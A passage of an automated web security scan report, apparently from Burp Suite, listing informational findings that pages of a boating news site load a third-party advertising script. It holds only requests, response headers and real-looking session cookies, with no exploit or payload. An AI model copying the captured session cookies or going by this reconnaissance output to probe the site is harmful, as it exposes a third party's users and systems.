Last-Modified: Fri, 28 Jan 2011 17:19:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.871. http://www.soundingsonline.com/columns-blogs/under-way

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/under-way

Issue detail

The response dynamically includes the following script from another domain: http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /columns-blogs/under-way HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.872. http://www.soundingsonline.com/component/chronocontact/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/chronocontact/

Issue detail

The response dynamically includes the following script from another domain: http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /component/chronocontact/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.873. http://www.soundingsonline.com/component/content/article/237622

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/content/article/237622

Issue detail

The response dynamically includes the following script from another domain: http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /component/content/article/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.874. http://www.soundingsonline.com/component/yvcomment/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/yvcomment/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /component/yvcomment/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.875. http://www.soundingsonline.com/contact-us

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /contact-us

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact-us HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.876. http://www.soundingsonline.com/features

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /features HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.877. http://www.soundingsonline.com/features/destinations

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/destinations

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /features/destinations HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.878. http://www.soundingsonline.com/features/in-depth

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/in-depth

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /features/in-depth HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.879. http://www.soundingsonline.com/features/justyesterday

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/justyesterday

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /features/justyesterday HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.880. http://www.soundingsonline.com/features/lifestyle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/lifestyle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /features/lifestyle HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.881. http://www.soundingsonline.com/features/profiles

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/profiles

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /features/profiles HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.882. http://www.soundingsonline.com/features/technical

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/technical

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /features/technical HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.883. http://www.soundingsonline.com/features/type-of-boat

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/type-of-boat

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /features/type-of-boat HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.884. http://www.soundingsonline.com/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.885. http://www.soundingsonline.com/more/digital-publications

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /more/digital-publications

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /more/digital-publications HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.886. http://www.soundingsonline.com/more/the-masters-series

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /more/the-masters-series

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /more/the-masters-series HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.887. http://www.soundingsonline.com/news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.888. http://www.soundingsonline.com/news/coastwise

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/coastwise

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news/coastwise HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
